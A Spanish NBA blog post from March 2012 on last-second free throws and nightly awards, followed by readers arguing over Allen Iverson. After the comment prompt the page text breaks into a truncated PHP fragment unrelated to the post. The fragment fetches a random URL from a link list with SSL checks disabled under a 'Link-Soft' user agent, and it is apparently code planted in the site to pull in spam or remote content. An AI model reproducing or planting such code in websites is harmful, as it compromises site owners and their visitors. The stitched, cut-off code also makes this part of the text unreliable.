La Crónica: La línea de tiros libres

06 de March de 2012 por TheDeerHunter

La línea de tiro libre se convierte en ocasiones en una especie de patíbulo. Muchos partidos se han ganado y perdido desde ese punto, aunque no tantos en una suerte de tanda de penaltis a todo o nada donde la presión alcanza el límite. Curiosamente ayer vivimos dos casos.

Tras padecer el huracán Love los Clippers llegaban a los últimos instantes sólo 3 abajo. Chris Paul sacó jugo a la inexperiencia de Derrick Williams para sacarle una falta de 3 tiros. En ese momento llevaba 6 de 6 y un poco después 8 de 8. Parecía imposible que fallara, pero como no se cansan de repetirnos “impossible is nothing”. Hasta a los más grandes se les encoje el brazo cuando menos lo esperamos. Los Clippers sumaron una nueva derrota y pierden comba en su carrera contra Lakers (94-95). Lejos de allí Marcus Thornton tiraba a la basura su gran partido pasándose de frenada en la decisiva defensa a Arron Afflalo en un desesperado lanzamiento triple, con 3 abajo en ese último instante. En agradecimiento al gesto el escolta no iba a fallar ninguna para forzar el tiempo extra, culminando su estelar actuación en el mismo para celebrar con victoria la recuperación de Gallinari y Nené (116-119). Muchas dudas de que haya sitio en este equipo para Rudy cuando vuelva.

No tuvieron tanta suerte en los instantes finales los Raptors ante un Dwight Howard imparable (92-88). Tampoco los Sixers triturados por la dupla Gooden-Jennings (93-97). Los Mavericks también parecen sometidos física y psicológicamente a los Thunder, al menos en esta regular (91-95). 3ª derrota en 4 partidos ante ellos.

Destacar también la actuación de Al Jefferson en la victoria de los Jazz ante Cleveland (109-100), así como la de Luol Deng en la paliza que los Bulls le dieron a Indiana (72-92). Los Blazers rompían su racha negativa ante NOLA (74-86) y los Warriors apenas tuvieron dificultades en Washington (120-100).

PREMIOS

MVP: Actuaciones de órdago las que hemos podido contemplar esta noche. 39 puntos y 17 rebotes de Kevin Love, 25 puntos, 13 rebotes y 7 asistencias de Al Jefferson, 36 puntos y 13 rebotes de Dwight Howard, 33 puntos, 7 asistencias de Brandon Jennings

Rookie: Kenneth Faried lo está rompiendo. No solo mantiene el nivel sino que mejora por momentos. Ayer se fue a los 20 puntos y 12 rebotes con un 7 de 9 en tiros de campo.

Sorpresa: Gordon Hayward empezó el partido en el banco pero lo acabó a lo grande, con 23 puntos (8 de 11), 4 rebotes y 5 asistencias.

Decepción: Trístisimo partido de los Pacers, que se quedaron en 72 puntos. 0 de 6 de Collison, 1 de 6 de Hibbert, 4 de 12 de Granger, 4 de 11 de West… Solo Paul George se salvó de la quema.

Esfuerzo en vano: Uno más para John Wall. Sus 20 puntos, 14 asistencias y 6 rebotes volvieron a ser insuficientes.

Imágenes | AP Photos / Getty Images

Comenta

61 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    melo15:
    Bueno, tampoco hace falta hacer lo que hicieron con Garnett, que le pagaron 120 millones, y les sancionaron, pues yo lo daria todo por Mayo, este jugador demostro que puede ser una estrella en sus primeros años, pero el entrenador de los Grizzlis, lo ha dejado de sexto hombre

    De acuerdo 100%

      Citar

  2. Sancho88 dice:
    #2

    Denise: Nico Batum es un crack y no lo digo ahora porque se esté saliendo. Lo considero un autentico crack desde la primera vez que lo ví, de hecho aqui en este blog lo metí en el 5 inicial del anterior Eurobasket antes de que empezara.

    PD: Entiendase por crack un jugador solidario que se sacrifica por su equipo y aporta en todas las facetas del juego, que no se entienda por crack un Allen Iverson y similares cuyo unico objetivo en el basket es tirarse todo lo que le llega, meter puntos y conseguir toda la fama para él.

    Junto a Kirilenko, es el mejor alero europeo que hay hoy en día. A mí también me encanta

      Citar

  3. melo15 dice:
    #3

    Pues Allen Iverson, era una superestrella, y muchisimo mejor que kirilenko, Batum, Mirotic todos juntos, ademas promediaba bastantes asistencias, Top-10 en escoltasd en la historia

      Citar

  4. rumbero dice:
    #4

    Creo que Mayo sería un muy buen perfil de escolta para los Wolves. Asumiendo un papel más protagonista que el que tiene ahora mismo en Memphis, pero sin llegar a ser un tio de 20 tiros por partido rollo Young o Ellis..que para eso ya estña Love

      Citar

  5. Viva_Dirk dice:
    #5

    melo15:
    Pues Allen Iverson, era una superestrella, y muchisimo mejor que kirilenko, Batum, Mirotic todos juntos, ademas promediaba bastantes asistencias, Top-10 en escoltasd en la historia

    Allen Iverson era el mayor chupón de la historia, un cancer para cualquier equipo de baloncesto. Un top 10000 de escoltas de la historia.

      Citar

  6. Esteban dice:
    #6

    iverson llego a promediar 30 puntos en una temporadas, pero promediando 30 tiros al aro…

      Citar

  7. rumbero dice:
    #7

    Iverson…ese crack incrompendido xD Suya es la primera camiseta NBA que me compré y ese primer partido de las finales contra Lakers debe ser la primera vez que me quedaba trasnochando.Que epocas Daimiel, si jugaba Kevin Ollie!!
    Si, era un chupón. Pero una de las máquinas de anotar más bestias que he visto nunca. 4 veces máximo anotador y un MVP. Suficientemente bueno como para meterlo algo más arriba que la posición 10000. Y llevar a esos Sixers a las finales tuvo su mérito…Crack

      Citar

  8. Denise dice:
    #8

    jaja, ya empezamos otra vez con el tema Iverson. En el baloncesto no todo es anotar, y personalmente prefiero a un jugador con menos talento natural pero profesional, sin chulería y egoismo, que baje el culo en defensa y que te pueda hacer un 14-5-3 + un buen puñado de intangibles antes que una sangijuela chupoptera que mete 30 puntos a base de hacer 10 de 28 mas 10 tiros libres y que te tira a la basura mas partidos de los que gana.

    A Iverson se le tiene idolatrado por sus highlights de Youtube y aquella temporada que llevó a los Sixers a la final vs Lakers. El resto de su carrera, una remora y una sangijuela para su equipo, incluido el resto de su etapa 76ers, su desatroso e infame paso por los Nuggets (Melo & A.I. vaya duo) (y como jugaban aquellos 76ers sin Iverson y con Andre Miller) , la porquería que hizo en los Pistons, y el plante que le hizo a principio de temporada a los Grizzlies dejandolos tirados (afortunadamente para los Ositos)

      Citar

  9. TheDeerHunter dice:
    #9

    Pero ¿qué narices le puedes reprochar a la defensa de Iverson? ¿tirar a la basura más partidos de los que gana?
    ¿el resumen de los 13 años de carrera de AI es lo que comentas?

    Desde el aprecio Denise… no sé si el problema es ignorancia o falta de memoria. Internet ayuda mucho tanto para lo uno como para lo otro.

    A Viva ya lo doy por imposible… es doble moral pura y dura y eso es difícil de solucionar.

      Citar

  10. nba dice:
    #10

    Dios estos Lakers, me encantan los bandazos que dan, ganan a Heat y en cambio pierden contra los Pistons ,
    partidazo de Pau-Bynum y como viene siendo habitual si nadie del banquillo aporta y Bryant no esta fino en el ataque pues pierden , es siempre la misma historia.

      Citar

  11. TheDeerHunter dice:
    #11

    La sanguijuela, rémora que decía Denise es el 4º jugador de la historia que más minutos le han hecho jugar sus entrenadores, sólo por detrás de Wilt Chamberlain, Bill Russell y Oscar Robertson.

    4 títulos de máximo anotador que nadie valora, pero el 7º mejor ladrón de la historia (con tres títulos) y promediando más de 6 asistencias (para que nos hagamos una idea un base como Calderón promedia 7)

    Además de los youtubes y de la final contra Lakers (que no creo que hubiera humano capaz de llevar a la final a aquel equipo y de plantar cara a aquellos Lakers con ellos) hay que reconocerle el MVP que no le regalaron, además de 3 semifinales de conferencia durante sus mejores años en los sixers (una de ellas especialmente criminal contra él por parte de los Celtics) y un balance victorias derrotas con la que nunca ha vuelto a soñar la franquicia.

    Ya le gustaría a Dwight Howard firmar la mitad de los logros que obtuvo AI. Si éste era un rémora, qué será el primero.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>